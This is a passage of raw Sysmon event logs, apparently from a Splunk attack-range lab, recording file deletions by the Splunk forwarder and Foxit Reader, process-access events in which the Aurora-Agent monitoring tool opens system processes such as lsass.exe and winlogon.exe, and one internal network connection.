Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D2320E416E649F31EE990E4E0BBF49,SHA256=422147BDA53AF070991E6E6CD72320504870EC95EEF7EBE424E2C049B75AFD97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015972Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:10.979{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C18901676CDB30BF72AEAEAC11C253,SHA256=DE9B5288047C55F05AD73E5B99A592B24E34194FBF27364D99A168DE49DC52FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:10.550{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA8FCDD5F1C97BF58876933D5F412B0,SHA256=650096553CE645A641901D98B1205A7E612FBDB744563B47A887DF0B14A81976,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.881{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=1F6B43A4197794E0789AD4C567112528,SHA256=79720992BA90EAA44941297893AA16A4E6C4A52F2517431FD9C8A7EFF0F19596,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.880{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_yyrbNlDfAcaWq2jMD5=EDDD19EABCACDF72C22DD4198373AFAD,SHA256=BF3593062333C876364714BD4F7EB87A212489F5DCCD335310B62880386961F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.869{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=AFF93FB1DE9C4530D927342315E6DC14,SHA256=16503C6961D2AB021B54BE34698240BB888A75487D6CBE70F936D91934F8E0DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 354300x800000000000000041242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:09.551{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56274-false10.0.1.12-8000- 10341000x800000000000000041241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.736{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.721{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.689{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.687{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:11.629{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFE3230E9594A69F977D6BBE19A9D955,SHA256=F7FE404E7F6344C0E18025FDA367F23F3C5F01E4F77A24745ADDDBB9FD3D49DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:12.763{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=631CB3F85AD609B7EA5A0A707127C10B,SHA256=7DD109A7AA3307708974615C46612468A632F708270FC12A7EC43FFDB2BC87BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015973Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:12.064{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057187F39BA13DC8B7C22585DA0BBC68,SHA256=56785CDA1F81C0C4FF3CBDEA3B24C575BA3197C08B1576826E7E540232738013,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:12.189{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 